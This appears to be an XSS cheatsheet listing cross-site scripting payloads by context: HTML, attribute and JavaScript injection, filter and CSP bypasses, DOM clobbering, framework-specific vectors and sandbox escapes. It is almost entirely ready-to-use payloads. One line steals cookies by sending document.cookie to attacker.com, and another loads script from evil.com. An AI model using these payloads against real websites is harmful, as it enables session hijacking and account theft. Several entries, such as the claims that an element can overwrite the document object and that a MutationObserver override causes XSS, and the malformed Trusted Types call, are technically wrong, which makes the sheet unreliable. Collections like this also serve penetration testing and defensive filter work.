XSS cheatsheet
Common Injection Contexts
HTML Context
"><img src=x onerror=alert(1)>
<script>alert(1)</script>
<svg/onload=alert(1)>
<math><mi//xlink:href="data:x,<script>alert(1)</script>">
Attribute Context
"><input autofocus onfocus=alert(1)>
"><a href="javascript:alert(1)">x</a>
"><body onload=alert(1)>
"><iframe srcdoc="<script>alert(1)</script>">
JavaScript Context
';alert(1);//
"+alert(1)+"
'+alert(1)+'
`-alert(1)-`
setTimeout`alert(1)`
Bypasses & Obfuscation
%3Cscript%3Ealert(1)%3C/script%3E
<script src="data:text/javascript;base64,YWxlcnQoMSk="></script>
<script>alert(1)</script>
eval`alert(1)`
setTimeout`alert\`document.domain\``
"-confirm`1`// '-confirm`1`//
CSP Bypasses
<script src="data:text/javascript,alert(1)"></script>
<iframe srcdoc="<script>alert(1)</script>">
<svg><foreignObject><iframe srcdoc="<script>alert(1)</script>"></iframe></foreignObject></svg>
Non-Script Elements
<svg/onload=alert(1)>
<details open ontoggle=alert(1)>
<marquee onstart=alert(1)>
<keygen autofocus onfocus=alert(1)>
<isindex onfocus=alert(1)>
<object data="javascript:alert(1)">
DOM-Based XSS
document.write(location.hash.slice(1))
eval(location.search.slice(1))
new Function(location.hash.slice(1))()
# URL: https://target.com/#<img src=x onerror=alert(1)>
Reflected/Stored Vectors
<input value="<script>alert(1)</script>">
Tricks
<iframe srcdoc="<script>alert(1)</script>"></iframe>
<svg><script xlink:href=data:;alert(1)></script></svg>
<a href="javascript:alert`XSS`">click</a>
div { background-image: url("data:text/html,<svg onload=alert(1)>"); }
Polyglots
<svg><script xlink:href=//evil.com></script>
<svg/onload=confirm`1`//</script>
Advanced & Niche XSS Payloads & Techniques
Advanced Polyglots & Parser Quirks
"';!--"<>'"!--<img src=x onerror=alert(1)>
<svg/onload=alert(document.domain)>
<math><mi//xlink:href="data:x,<script>alert(1)</script>">
<svg><script xlink:href=data:text/javascript;base64,YWxlcnQoMSk=></script></svg>
<iframe srcdoc="<svg/onload=alert(1)>">
<meta http-equiv="refresh" content="0;url=javascript:alert(1)">
<script nonce="">alert(1)</script> <!-- CSP bypass if nonce is empty -->
DOM Clobbering & MutationObserver
<input name="foo" id="document"> <!-- Overwrites document object -->
<form id="alert"></form> <!-- Clobber alert function -->
javascript:document.forms[0].id='alert';alert('clobbered');
MutationObserver.prototype.observe = function() { alert('Mutation XSS'); };
window.addEventListener('hashchange', () => eval(location.hash.slice(1)));
CSP Bypass Techniques
<script src="data:text/javascript,alert(1)"></script> <!-- Data URI script tag -->
<iframe srcdoc="<script>alert(1)</script>"></iframe>
<img src=x onerror="fetch('https://attacker.com/?cookie='+document.cookie)">
<svg onload="alert(1)" xmlns="http://www.w3.org/2000/svg">
<iframe sandbox="allow-scripts" srcdoc="<script>alert(1)</script>"></iframe>
Trusted Types bypass (if misconfigured):
<script>
window.trustedTypes.createPolicy('default', { createScript: (s) => s })(`alert(1)`);
</script>
Framework-Specific XSS
AngularJS:
<div ng-app ng-csp><div ng-bind="constructor.constructor('alert(1)')()"></div></div>
React:
<div dangerouslySetInnerHTML={{__html: '<img src=x onerror=alert(1)>'}}/>
Vue:
<div v-html="`<img src=x onerror=alert(1)>`"></div>
HTTP Header Injection
Set-Cookie: SESSIONID=abc123; HttpOnly
X-Forwarded-Host: attacker.com<script>alert(1)</script>
<meta http-equiv="refresh" content="0;url=javascript:alert(1)">
Sandbox Escape Vectors
<iframe sandbox="allow-scripts allow-same-origin" srcdoc="<script>alert(1)</script>"></iframe>
<iframe sandbox="allow-scripts" src="javascript:alert(1)"></iframe> <!-- some browsers allow this -->
Timing & Side-Channel Attacks
Using <img src=... onerror=...> or CSS animations to exfiltrate data over time.
Example: CSS-based keylogger or timing attack by measuring style changes.
<style>
@keyframes x { from { opacity: 0 } to { opacity: 1 } }
input { animation-name: x; animation-duration: 1s; animation-iteration-count: infinite; }
input:invalid { animation-play-state: paused; }
</style>
References & Further Reading